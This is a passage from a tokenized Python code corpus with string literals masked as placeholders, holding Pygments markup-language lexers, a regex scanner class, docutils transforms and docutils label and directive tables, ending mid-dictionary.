[ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' ] <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Text , Name . Tag ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Text , Name . Tag ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Text , Name . Entity ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Text , Name . Tag ) , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Name . Entity , Text , Keyword ) ) , <EOL> ( r'<STR_LIT>' , <EOL> bygroups ( Keyword , Text , Name . Tag ) ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Keyword ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Entity ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Operator ) , <EOL> ( r'<STR_LIT>' , String . Double ) , <EOL> ( r'<STR_LIT>' , String . Single ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , Comment ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT:#pop>' ) , <EOL> ( '<STR_LIT:->' , Comment ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Name . Tag ) , <EOL> ( r'<STR_LIT:>>' , Keyword , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , <EOL> Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Keyword . Reserved ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT:>>' , Keyword , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Name . Entity ) , <EOL> ( r'<STR_LIT:>>' , Keyword , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Keyword . Constant ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT:>>' , Keyword , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> } <EOL> def analyse_text ( text ) : <EOL> if not looks_like_xml ( text ) and ( '<STR_LIT>' in text or '<STR_LIT>' in text or '<STR_LIT>' in text ) : <EOL> return <NUM_LIT> <EOL> class XmlLexer ( RegexLexer ) : <EOL> """<STR_LIT>""" <EOL> flags = re . MULTILINE | re . DOTALL | re . UNICODE <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( '<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Entity ) , <EOL> ( r'<STR_LIT>' , Comment . Preproc ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Comment . Preproc ) , <EOL> ( '<STR_LIT>' , Comment . Preproc ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Tag ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , Comment ) , <EOL> ( '<STR_LIT>' , Comment , '<STR_LIT:#pop>' ) , <EOL> ( '<STR_LIT:->' , Comment ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Attribute , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( '<STR_LIT>' , Text ) , <EOL> ( '<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ( "<STR_LIT>" , String , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> } <EOL> def analyse_text ( text ) : <EOL> if looks_like_xml ( text ) : <EOL> return <NUM_LIT> <EOL> class XsltLexer ( XmlLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> EXTRA_KEYWORDS = set ( ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:key>' , '<STR_LIT:message>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:text>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' <EOL> ) ) <EOL> def get_tokens_unprocessed ( self , text ) : <EOL> for index , token , value in XmlLexer . get_tokens_unprocessed ( self , text ) : <EOL> m = re . match ( '<STR_LIT>' , value ) <EOL> if token is Name . Tag and m and m . group ( <NUM_LIT:1> ) in self . EXTRA_KEYWORDS : <EOL> yield index , Keyword , value <EOL> else : <EOL> yield index , token , value <EOL> def analyse_text ( text ) : <EOL> if looks_like_xml ( text ) and '<STR_LIT>' in text : <EOL> return <NUM_LIT> <EOL> class HamlLexer ( ExtendedRegexLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' ] <EOL> flags = re . IGNORECASE <EOL> _dot = r'<STR_LIT>' <EOL> _comma_dot = r'<STR_LIT>' + _dot + '<STR_LIT:)>' <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , _indentation ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Class , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Function , '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _comma_dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( RubyLexer ) ) , <EOL> '<STR_LIT:root>' ) , <EOL> default ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT:content>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , Name . Namespace , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Comment , Comment . Special , Comment ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT:/>' + _dot + r'<STR_LIT>' , _starts_block ( Comment , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , _starts_block ( Comment . Preproc , <EOL> '<STR_LIT>' ) , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _comma_dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( RubyLexer ) ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT::>' + _dot + r'<STR_LIT>' , _starts_block ( Name . Decorator , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> include ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( RubyLexer ) ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( RubyLexer ) ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation ) , <EOL> include ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( RubyLexer ) , String . Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Attribute , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Variable , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Instance , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Global , '<STR_LIT:#pop>' ) , <EOL> ( r"<STR_LIT>" , String , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment . Preproc ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Decorator ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( RubyLexer ) , String . Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> } <EOL> class ScamlLexer ( ExtendedRegexLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' ] <EOL> flags = re . IGNORECASE <EOL> _dot = r'<STR_LIT:.>' <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , _indentation ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Class , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Function , '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( ScalaLexer ) ) , <EOL> '<STR_LIT:root>' ) , <EOL> default ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT:content>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , Name . Namespace , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Comment , Comment . Special , Comment ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT:/>' + _dot + r'<STR_LIT>' , _starts_block ( Comment , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , _starts_block ( Comment . Preproc , <EOL> '<STR_LIT>' ) , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , Keyword , using ( ScalaLexer ) ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( ScalaLexer ) ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT::>' + _dot + r'<STR_LIT>' , _starts_block ( Name . Decorator , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> include ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( ScalaLexer ) ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( ScalaLexer ) ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation ) , <EOL> include ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( ScalaLexer ) , String . Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Attribute , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Variable , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Instance , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Global , '<STR_LIT:#pop>' ) , <EOL> ( r"<STR_LIT>" , String , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment . Preproc ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Decorator ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( ScalaLexer ) , String . Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> } <EOL> class JadeLexer ( ExtendedRegexLexer ) : <EOL> """<STR_LIT>""" <EOL> name = '<STR_LIT>' <EOL> aliases = [ '<STR_LIT>' ] <EOL> filenames = [ '<STR_LIT>' ] <EOL> mimetypes = [ '<STR_LIT>' ] <EOL> flags = re . IGNORECASE <EOL> _dot = r'<STR_LIT:.>' <EOL> tokens = { <EOL> '<STR_LIT:root>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , _indentation ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Class , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Function , '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( ScalaLexer ) ) , '<STR_LIT:root>' ) , <EOL> default ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT:content>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , Name . Namespace , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Comment , Comment . Special , Comment ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT:/>' + _dot + r'<STR_LIT>' , _starts_block ( Comment , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , _starts_block ( Comment . Preproc , <EOL> '<STR_LIT>' ) , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , Keyword , using ( ScalaLexer ) ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' + _dot + r'<STR_LIT>' , <EOL> bygroups ( Punctuation , using ( ScalaLexer ) ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT::>' + _dot + r'<STR_LIT>' , _starts_block ( Name . Decorator , '<STR_LIT>' ) , <EOL> '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Tag , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> include ( '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( ScalaLexer ) ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , using ( ScalaLexer ) ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Punctuation ) , <EOL> include ( '<STR_LIT>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( ScalaLexer ) , String . Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Attribute , '<STR_LIT>' ) , <EOL> ( r'<STR_LIT>' , Name . Attribute ) , <EOL> ( r'<STR_LIT>' , Text , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Text ) , <EOL> ( r'<STR_LIT>' , Name . Variable , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Instance , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , Name . Variable . Global , '<STR_LIT:#pop>' ) , <EOL> ( r"<STR_LIT>" , String , '<STR_LIT:#pop>' ) , <EOL> ( r'<STR_LIT>' , String , '<STR_LIT:#pop>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( _dot + '<STR_LIT:+>' , Comment . Preproc ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> '<STR_LIT>' : [ <EOL> ( r'<STR_LIT>' , Name . Decorator ) , <EOL> ( r'<STR_LIT>' + _dot + '<STR_LIT>' , <EOL> bygroups ( String . Interpol , using ( ScalaLexer ) , String . Interpol ) ) , <EOL> ( r'<STR_LIT:\n>' , Text , '<STR_LIT:root>' ) , <EOL> ] , <EOL> } </s>
<s> """<STR_LIT>""" <EOL> import re <EOL> class EndOfText ( RuntimeError ) : <EOL> """<STR_LIT>""" <EOL> class Scanner ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , text , flags = <NUM_LIT:0> ) : <EOL> """<STR_LIT>""" <EOL> self . data = text <EOL> self . data_length = len ( text ) <EOL> self . start_pos = <NUM_LIT:0> <EOL> self . pos = <NUM_LIT:0> <EOL> self . flags = flags <EOL> self . last = None <EOL> self . match = None <EOL> self . _re_cache = { } <EOL> def eos ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . pos >= self . data_length <EOL> eos = property ( eos , eos . __doc__ ) <EOL> def check ( self , pattern ) : <EOL> """<STR_LIT>""" <EOL> if self . eos : <EOL> raise EndOfText ( ) <EOL> if pattern not in self . _re_cache : <EOL> self . _re_cache [ pattern ] = re . compile ( pattern , self . flags ) <EOL> return self . _re_cache [ pattern ] . match ( self . data , self . pos ) <EOL> def test ( self , pattern ) : <EOL> """<STR_LIT>""" <EOL> return self . check ( pattern ) is not None <EOL> def scan ( self , pattern ) : <EOL> """<STR_LIT>""" <EOL> if self . eos : <EOL> raise EndOfText ( ) <EOL> if pattern not in self . _re_cache : <EOL> self . _re_cache [ pattern ] = re . compile ( pattern , self . flags ) <EOL> self . last = self . match <EOL> m = self . _re_cache [ pattern ] . match ( self . data , self . pos ) <EOL> if m is None : <EOL> return False <EOL> self . start_pos = m . start ( ) <EOL> self . pos = m . end ( ) <EOL> self . match = m . group ( ) <EOL> return True <EOL> def get_char ( self ) : <EOL> """<STR_LIT>""" <EOL> self . scan ( '<STR_LIT:.>' ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( <EOL> self . __class__ . __name__ , <EOL> self . pos , <EOL> self . data_length <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> from docutils import nodes , utils , languages <EOL> from docutils . transforms import Transform <EOL> class Compound ( Transform ) : <EOL> """<STR_LIT>""" <EOL> default_priority = <NUM_LIT> <EOL> def apply ( self ) : <EOL> for compound in self . document . traverse ( nodes . compound ) : <EOL> first_child = True <EOL> for child in compound : <EOL> if first_child : <EOL> if not isinstance ( child , nodes . Invisible ) : <EOL> first_child = False <EOL> else : <EOL> child [ '<STR_LIT>' ] . append ( '<STR_LIT>' ) <EOL> compound . replace_self ( compound [ : ] ) <EOL> class Admonitions ( Transform ) : <EOL> """<STR_LIT>""" <EOL> default_priority = <NUM_LIT> <EOL> def apply ( self ) : <EOL> language = languages . get_language ( self . document . settings . language_code , <EOL> self . document . reporter ) <EOL> for node in self . document . traverse ( nodes . Admonition ) : <EOL> node_name = node . __class__ . __name__ <EOL> node [ '<STR_LIT>' ] . append ( node_name ) <EOL> if not isinstance ( node , nodes . admonition ) : <EOL> admonition = nodes . admonition ( node . rawsource , * node . children , <EOL> ** node . attributes ) <EOL> title = nodes . title ( '<STR_LIT>' , language . labels [ node_name ] ) <EOL> admonition . insert ( <NUM_LIT:0> , title ) <EOL> node . replace_self ( admonition ) </s>
<s> """<STR_LIT>""" <EOL> from genshi . filters . html import HTMLFormFiller , HTMLSanitizer <EOL> from genshi . filters . i18n import Translator <EOL> from genshi . filters . transform import Transformer <EOL> __docformat__ = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> labels = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:address>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:version>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:status>' : '<STR_LIT>' , <EOL> '<STR_LIT:date>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:error>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> """<STR_LIT>""" <EOL> bibliographic_fields = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:address>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:version>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:status>' , <EOL> '<STR_LIT>' : '<STR_LIT:date>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> """<STR_LIT>""" <EOL> author_separators = [ '<STR_LIT:;>' , '<STR_LIT:U+002C>' ] <EOL> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> directives = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:code>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:error>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:image>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:replace>' , <EOL> '<STR_LIT>' : '<STR_LIT:replace>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:date>' , <EOL> '<STR_LIT>' : '<STR_LIT:class>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:title>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : '<STR_LIT>' , <EOL> u'<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> """<STR_LIT>""" <EOL> roles = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , 